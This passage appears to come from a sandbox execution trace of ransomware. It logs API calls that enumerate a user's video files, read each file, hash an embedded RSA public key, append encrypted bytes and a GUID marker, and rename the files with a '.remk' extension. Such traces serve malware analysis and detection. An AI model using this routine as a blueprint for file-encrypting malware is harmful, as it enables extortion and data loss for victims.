KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.679] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.680] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.680] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.680] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.680] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.680] GetLastError () returned 0x0 [0234.680] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.680] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.680] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.680] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.680] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.681] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.681] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.681] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.681] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.682] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.682] CloseHandle (hObject=0x640) returned 1 [0234.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x325d3b0 [0234.688] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\uWd 0nDi4nHu_OcIzO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\uwd 0ndi4nhu_ocizo.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\uWd 0nDi4nHu_OcIzO.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\uwd 0ndi4nhu_ocizo.swf.remk")) returned 1 [0234.700] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa145080, ftCreationTime.dwHighDateTime=0x1d5e414, ftLastAccessTime.dwLowDateTime=0xba7619f0, ftLastAccessTime.dwHighDateTime=0x1d5e3dc, ftLastWriteTime.dwLowDateTime=0xba7619f0, ftLastWriteTime.dwHighDateTime=0x1d5e3dc, nFileSizeHigh=0x0, nFileSizeLow=0xa15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uWd 0nDi4nHu_OcIzO.swf", cAlternateFileName="UWD0ND~1.SWF")) returned 0 [0234.700] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0234.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0234.702] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.702] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.705] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0234.705] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0234.705] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.705] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.705] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.705] PathFindFileNameW (pszPath="") returned="" [0234.705] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88546410, ftCreationTime.dwHighDateTime=0x1d5e146, ftLastAccessTime.dwLowDateTime=0x7f6b8a00, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0x7f6b8a00, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.707] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88546410, ftCreationTime.dwHighDateTime=0x1d5e146, ftLastAccessTime.dwLowDateTime=0x7f6b8a00, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0x7f6b8a00, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.707] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5da40e0, ftCreationTime.dwHighDateTime=0x1d5dd6a, ftLastAccessTime.dwLowDateTime=0x91c5df10, ftLastAccessTime.dwHighDateTime=0x1d5e5ab, ftLastWriteTime.dwLowDateTime=0x91c5df10, ftLastWriteTime.dwHighDateTime=0x1d5e5ab, nFileSizeHigh=0x0, nFileSizeLow=0xa18c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4WiEyq TSCYneVBnG4.flv", cAlternateFileName="4WIEYQ~1.FLV")) returned 1 [0234.707] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\4WiEyq TSCYneVBnG4.flv") returned=".flv" [0234.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\4WiEyq TSCYneVBnG4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\4wieyq tscynevbng4.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.708] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=41356) returned 1 [0234.708] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.711] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa166, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.712] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.713] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa18c, lpOverlapped=0x0) returned 1 [0234.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.714] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.716] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.716] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.716] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.716] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.716] GetLastError () returned 0x0 [0234.716] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.716] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.716] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.716] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.716] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.717] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.718] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa18c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.718] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.718] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.718] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.718] CloseHandle (hObject=0x640) returned 1 [0234.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0234.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b0 [0234.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0234.735] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\4WiEyq TSCYneVBnG4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\4wieyq tscynevbng4.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\4WiEyq TSCYneVBnG4.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\4wieyq tscynevbng4.flv.remk")) returned 1 [0234.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0234.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.736] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0234.738] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25fcfdb0, ftCreationTime.dwHighDateTime=0x1d5df37, ftLastAccessTime.dwLowDateTime=0xd5aa16b0, ftLastAccessTime.dwHighDateTime=0x1d5dad9, ftLastWriteTime.dwLowDateTime=0xd5aa16b0, ftLastWriteTime.dwHighDateTime=0x1d5dad9, nFileSizeHigh=0x0, nFileSizeLow=0xcf37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BP1P5M5rRgJVJ_zFpje.swf", cAlternateFileName="BP1P5M~1.SWF")) returned 1 [0234.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.738] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\BP1P5M5rRgJVJ_zFpje.swf") returned=".swf" [0234.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\BP1P5M5rRgJVJ_zFpje.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\bp1p5m5rrgjvj_zfpje.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.739] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=53047) returned 1 [0234.739] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.742] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xcf11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.742] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.743] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.743] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xcf37, lpOverlapped=0x0) returned 1 [0234.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.745] lstrlenA (lpString="-----BEGIN PUBLIC 